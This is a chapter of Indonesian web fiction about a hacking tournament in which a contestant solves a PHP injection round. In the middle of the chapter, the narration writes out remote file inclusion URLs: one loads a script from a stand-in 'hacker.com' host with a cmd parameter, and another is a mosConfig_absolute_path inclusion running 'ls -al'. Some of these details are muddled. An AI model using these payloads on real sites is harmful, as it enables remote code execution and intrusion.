*
*
*
*
Happy Reading :)
PHP Injection merupakan salah satu aksi hacking yang memanfaatkan kesalahan scripting PHP yang mengizinkan aplikasi untuk meng-include dan mengeksekusi suatu file/ page (script) baik secara local maupun remote.
Beast mengunjungi website targetnya. Giginya yang terus menggerutuk membuat para polisi cyber yang berada di dekatnya hanya menatapnya dengan wajah keheranan. Tangannya tidak bergetar, tapi giginya bergetar dengan hebat.
"Aku lapar!" keluh Beast dengan nada lirih. Tubuhnya yang sedikit gempal. Pipinya yang cubby, jemari pendek yang sedikit mengembung, dan bibir merahnya yang kecil tidak berhenti mengeluarkan suara dari giginya. Polisi yang berada di sekitarnya hanya menganggukkan kepalanya.
"Anda mau?" tawar polisi yang duduk di sebelah kirinya seraya menyodorkan permen karet berbentuk bulat dengan berbagai macam warna di tangannya.
Dengan cepat tangan Beast mengambil dua permen karet dari tangan polisi tersebut dan memakannya. "Te-terima ka-kasih." Gumamnya seraya menundukkan kepala.
"Jika kau mau lagi, katakan saja. Ini tisu." Ujar polisi tersebut serata meletakkan tisu yang masih terbungkus rapi di dalam wadahnya di dekat keyboard Beast. Beast menganggukan kepalanya.
...
"Apa yang kau perintahkan pada mereka?" Tanya Sarah yang berdiri di dekat Kuran yang duduk di lantai dua. Kuran dengan santai memegang tengkuknya dan mencoba membuat lehernya tidak kaku. Jhon yang berdiri di dekat Kuran hanya melirik anggota kelompoknya.
"Hanya meminta mereka untuk bersikap baik. Mereka tidak akan melakukan kesalahan seperti satu tahun yang lalu karena aku yang memilahnya sendiri." Jawab Kuran dengan santai. "Saat kau berada di bawah tekanan, bukankah kau perlu pendorong untuk sedikit meringankan tekanannya?" tambahnya.
...
Beast yang mengunyah permen karet seraya memejamkan matanya. Menikmati setiap gigitan dan rasa yang keluar. Beast menarik napas dan menghembuskannya dengan pelan melalui mulut. Perlahan matanya terbuka. Tangan kanan memegang mouse dan tangan kiri bersiap mengetik di atas keyboard. "Mari kita mulai, Beast!" gumamnya dengan sorot mata berubah menjadi tajam.
Beast mengganti alamat web yang dia dapatkan. Alamat URL dia dapatkan berupa http://www.situs-target.com/index.php?file=apa-saja.html menjadi http://www.situs-target.com/index.php?file=http://hacker.com/file.txt?cmd=[kode-eksekusi]
Gadis itu menekan tombol ctrl dengan jari telunjuk kanan dan tombol n dengan jari kelingkingnya hingga di layar komputernya muncul halaman baru untuk browsernya. Dia mendaftar domain dan hostingnya. Kemudian, memasukkan script inject yang dia tanam dalam hostingnya menjadi, http://www.target.com/forum.php?mosConfig_absolute_path=situs-target.com/cmd.txt&cmd=Is –al.
Tampilan layarnya kini memunculkan huruf yang membentuk sebuah kata dan angka yang tersusun secara acak. Kolom pertama, menampilkan gabungan angka yang membentuk seperti kata sandi yang terdiri dari delapan angka yang secara acak, seperti 17859067, 51462280, dan lain sebagainya. Kolom kedua, gabungan beberapa huruf dan tanda hubung (-). Contoh, drwxr-xr-x, -rw-r--r--, dan lain sebagainya. Kolom ketiga, berisi angka dari satu hingga tak hingga namun, biasanya hanya dari angka satu hingga dua puluhan secara acak. Contoh, 1, 4, 14, dan sebagainya. Pada kolom keempat dan kelima berisi kata yang sama yaitu, bedista.
Kolom keenam, sama seperti kolom pertama yang berisi berbagai macam angka. Hal yang membedakannya adalah jumlah angkanya. Di kolom pertama terdiri dari delapan angka sedangkan, pada kolom keenam hanya terdiri dari empat hingga lima angka. Contohnya: 12307, 4096, 1058, dan sebagainya. Pada kolom ketujuh, berisi bulan. Kolom kedelapan, berisi tanggal. Kolom kesembilan berisi catatan waktu. Lalu, pada kolom kesepuluh atau kolom terakhir, berisi nama program. Misalnya, download.php, files, cache, dan lain sebagainya.
Hasil eksekusi akan berbeda untuk setiap perintah yang digunakan. Misalnya: menggunakan Id untuk melihat id user dan pwd untuk menampilkan direktori aktif. Beast menginjeksinya, banyak kumpulan kata yang disertai tanda petik ("), lambang kurang (<), maupun lambang lebih (>).
...
Gun bertepuk tangan dengan pelan. Seluruh mata kini memandanginya. Terkejut, penasaran, dan tatapan aneh dia dapatkan. "Siapa menyangka permainan ini begitu singkat. Saya akan memberikan point terbaik pada Miss Shinta, Miss Beast from Hunter King, and Mr. King from King&Queen." Ujarnya seraya menampilkan seluruh catatan waktu pada layar di balik tubuhnya.
"Saya tidak mempermasalahkan Script Kiddies(23) karena permainan ini membiarkan pesertanya bermain tanpa batas waktu namun, para panitia memiliki batasan waktu, yaitu kurang dari empat menit. Waktu yang tercatat pun sangat berdekatan. Ini semakin menarik. Kita gunakan batasan waktu untuk permainan selanjutnya yang pastinya sangat mudah. Cross-Site Scripting." Tambah Gun dengan senang dan senyuman lebar di balik topengnya.
Para peserta hanya bisa menelan ludah, mengigiti jemarinya, dan membiarkan getaran tubuh bergerak. Jika dipikirkan kembali, tersisa dua orang anggota yang belum bermain dari setiap kelompok. Perasaan lega dan khawatir kini saling mengaduk dalam diri para peserta. Shinta, Janus, dan Rama hanya diam tidak terganggu dengan hal tersebut karena mereka adalah peserta tanpa kelompok.
Footnote
(23)Orang yang bisanya menggunakan script milik orang lain untuk melakukan aksi hacking dan mengaku sebagai master hacking sebenarnya.
KAMU SEDANG MEMBACA
Hacking Game
Science FictionSebuah pertandingan Hacking diadakan oleh sekelompok orang yang mengaku pendiri dari organisasi hacker terkenal. Hanya orang yang mendapat undangan yang dapat mengikuti pertandingan ini. Saat ini, pertandingan akan diadakan di Hawaii Keiko Setagawa...
